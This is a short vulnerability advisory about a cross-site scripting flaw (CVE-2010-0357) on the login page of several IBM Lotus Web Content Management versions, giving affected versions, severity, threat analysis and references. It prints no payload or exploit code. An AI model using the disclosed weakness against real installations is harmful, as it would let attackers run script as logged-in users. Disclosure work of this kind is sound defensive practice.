Overview
» IDS/IPS Signatures
Security Sites
iPolicy Networks Security Advisory
 

IBM Lotus Web Content Management Login Page XSS Vulnerability
Date Discovered: 01/20/2009
Severity: High
Applications Affected: IBM Lotus WCM 6.0.1.4
IBM Lotus WCM 6.0.1.5
IBM Lotus WCM 6.0.1.6
IBM Lotus WCM 6.1.0.1
IBM Lotus WCM 6.1.0.2
Type: Remote
Identifiers: CVE-2010-0357
Synopsis
IBM Lotus Web Content Management is prone cross-site scripting vulnerability, which could be exploited to execute arbitrary script code in security context of logged-in user.
Recommended Actions
Allow only trusted users.
Threat Analysis
IBM Lotus Web Content Management is a content management software product by IBM intended to help in website design and maintenance. The product is part of IBM's Lotus family of products. Clients can install the product as a separate product or as an integrated option with WebSphere Portal.

IBM Lotus Web Content Management is prone cross-site scripting vulnerability. This vulnerability exists in the login page of application using the vulnerable parameters. Successful exploitation allows remote attackers to execute arbitrary script code in security context of logged-in user.
References

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0357
http://xforce.iss.net/xforce/xfdb/55663
http://www.securityfocus.com/bid/37825

Write-up by: Gaurav Bajpai